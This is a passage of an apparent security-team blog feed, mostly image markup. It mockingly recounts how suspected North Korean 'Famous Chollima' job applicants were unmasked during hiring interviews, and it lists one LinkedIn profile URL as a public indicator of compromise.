src="https://substackcdn.com/image/fetch/$s_!0wLO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png" width="322" height="638.7336448598131" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6b8cecf3-f0d7-49ce-ab00-fa25c53ef7b4_856x1698.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1698,&quot;width&quot;:856,&quot;resizeWidth&quot;:322,&quot;bytes&quot;:1351318,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b8cecf3-f0d7-49ce-ab00-fa25c53ef7b4_856x1698.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0wLO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png 424w, https://substackcdn.com/image/fetch/$s_!0wLO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png 848w, https://substackcdn.com/image/fetch/$s_!0wLO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png 1272w, https://substackcdn.com/image/fetch/$s_!0wLO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Getting jobs in an <strong>easier way</strong>? I like it.</p><p>We go back to Telegram where he keeps helping me improve my poor resume. On the way, he also discloses another phone number, this time from Texas, United States.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AecU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AecU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png 424w, https://substackcdn.com/image/fetch/$s_!AecU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png 848w, https://substackcdn.com/image/fetch/$s_!AecU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png 1272w, https://substackcdn.com/image/fetch/$s_!AecU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AecU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png" width="352" height="720.636815920398" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1646,&quot;width&quot;:804,&quot;resizeWidth&quot;:352,&quot;bytes&quot;:1513807,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!AecU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png 424w, https://substackcdn.com/image/fetch/$s_!AecU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png 848w, https://substackcdn.com/image/fetch/$s_!AecU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png 1272w, https://substackcdn.com/image/fetch/$s_!AecU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0fe3d4b-a2b1-4efd-b20c-9e38c846af11_804x1646.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I&#8217;m glad I met my new friend Jes&#250;s Sebasti&#225;n. There is something weird, though: what I found is that he likes his own posts, maybe just because he is lonely. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!bobl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!bobl!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png 424w, https://substackcdn.com/image/fetch/$s_!bobl!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png 848w, https://substackcdn.com/image/fetch/$s_!bobl!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png 1272w, https://substackcdn.com/image/fetch/$s_!bobl!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!bobl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png" width="471" height="601.6820809248555" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1326,&quot;width&quot;:1038,&quot;resizeWidth&quot;:471,&quot;bytes&quot;:453017,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!bobl!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png 424w, https://substackcdn.com/image/fetch/$s_!bobl!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png 848w, https://substackcdn.com/image/fetch/$s_!bobl!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png 1272w, https://substackcdn.com/image/fetch/$s_!bobl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F186d7f9e-ec15-413b-b19c-6c4f22c46875_1038x1326.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Worry not, my new <em>pony-head</em> friend, I will get you a tonne of likes from our LinkedIn readers.</p><p>And maybe more friends too!</p><p>We are the <strong>Quetzal Team</strong>. We put the &#8220;<strong>Famous</strong>&#8221; in &#8220;<strong>Famous Chollima</strong>&#8221;. </p><div><hr></div><h2>Public IOCs</h2><pre><code>URL:https://linkedin.com/in/jesus-sebastian/</code></pre><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UXdB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UXdB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png 424w, https://substackcdn.com/image/fetch/$s_!UXdB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png 848w, https://substackcdn.com/image/fetch/$s_!UXdB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png 1272w, https://substackcdn.com/image/fetch/$s_!UXdB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UXdB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png" width="198" height="198" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/eaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:198,&quot;bytes&quot;:70380,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UXdB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png 424w, https://substackcdn.com/image/fetch/$s_!UXdB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png 848w, https://substackcdn.com/image/fetch/$s_!UXdB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png 1272w, https://substackcdn.com/image/fetch/$s_!UXdB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Feaedf1a8-1bca-4160-bb2d-45df2a6a004a_1280x1280.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div>]]></content:encoded></item><item><title><![CDATA[Interview with the Chollima V]]></title><description><![CDATA[This is getting sad already]]></description><link>https://quetzal.bitso.com/p/interview-with-the-chollima-v</link><guid isPermaLink="false">https://quetzal.bitso.com/p/interview-with-the-chollima-v</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Fri, 07 Nov 2025 15:58:06 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!8XGz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Another day, another <strong>DPRK</strong> <strong>infiltration attempt.</strong> </p><p>It&#8217;s Friday, so I won&#8217;t bore you with a sermon about threat actors&#8217; <strong>tactics, techniques and procedures</strong> or <strong>indicators of veterancy</strong>, but I&#8217;ll allow myself to echo my words from <a href="https://quetzal.bitso.com/p/interview-with-the-chollima-iv">our last article regarding the Kim Boys</a>: </p><div class="pullquote"><p>&#8220;If one of them messes up, prepare for a quick follow-up&#8221;. </p></div><p>And if we are all together here today (<em>once again</em>) it means two things:</p><ol><li><p>The previous <em>pony-heads</em> <strong>messed up bad</strong>.</p></li><li><p>A new <em>pony-head</em> tried to play hero. <strong>And messed up too</strong>.</p></li></ol><p>There&#8217;s something bluntly <em><a href="https://en.wikipedia.org/wiki/Commissar">kommissar</a>-esque</em> about this (<em>and here I am, talking about TTPs again</em>), as I interpret this badly-planned <em>insistence</em> not as <strong>persistence</strong> (like an <strong>APT</strong>) but rather as the frustration of <em>someone higher up</em> constantly sending <strong>one after another</strong> until someone could claim the prize. This someone wasn&#8217;t &#8220;<strong>Sebastian</strong>&#8221;&#8230; that&#8217;s for sure.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8XGz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8XGz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png 424w, https://substackcdn.com/image/fetch/$s_!8XGz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png 848w, https://substackcdn.com/image/fetch/$s_!8XGz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png 1272w, https://substackcdn.com/image/fetch/$s_!8XGz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8XGz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png" width="1456" height="858" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:858,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:5538631,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8XGz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png 424w, https://substackcdn.com/image/fetch/$s_!8XGz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png 848w, https://substackcdn.com/image/fetch/$s_!8XGz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png 1272w, https://substackcdn.com/image/fetch/$s_!8XGz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b74553e-c420-44ab-b77d-e9e77b5ab064_3644x2148.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Who&#8217;s &#8220;Sebastian&#8221;? Our friend here, a &#8220;<strong>Colombian</strong>&#8221; &#8220;software engineer&#8221; &#8220;from <strong>Pereira</strong>&#8221;.</p><p>He likes doing <strong>typical colombian things</strong> like <strong>not speaking Spanish</strong>, as seen in this interview with our Talent Acquisition Specialist (who now leads the scoreboard in <em>Whack-a-Chollima Online</em>):</p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;f0917c61-d010-4a96-8170-0f58a506a52e&quot;,&quot;duration&quot;:null}"></div><p>During the interview, <strong>he mumbles some passable Spanish </strong>(<a href="https://quetzal.bitso.com/p/interview-with-the-chollima-ii">we&#8217;ve seen this before</a>) but once again becomes easily cornered by his interviewer who, in real time, <strong>checked his LinkedIn profile just to find it was gone</strong> (along with his hopes of getting the job). </p><p>This is a typical behaviour I described <a href="https://quetzal.bitso.com/p/interview-with-the-chollima-iv">in our last article</a>: <strong>delete everything and run</strong> when they feel threatened or discovered.</p><p>In this economy, losing your professional profile can hit hard, so we did a good thing today by <strong>grabbing a copy of his profile</strong> before it got swept under the internet&#8217;s rug forever!</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!bLr8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!bLr8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png 424w, https://substackcdn.com/image/fetch/$s_!bLr8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png 848w, https://substackcdn.com/image/fetch/$s_!bLr8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png 1272w, https://substackcdn.com/image/fetch/$s_!bLr8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!bLr8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf5c77c2-a197-4e73-90ee-300dff3a0188_1444x324.png" width="536" height="120.26592797783934" 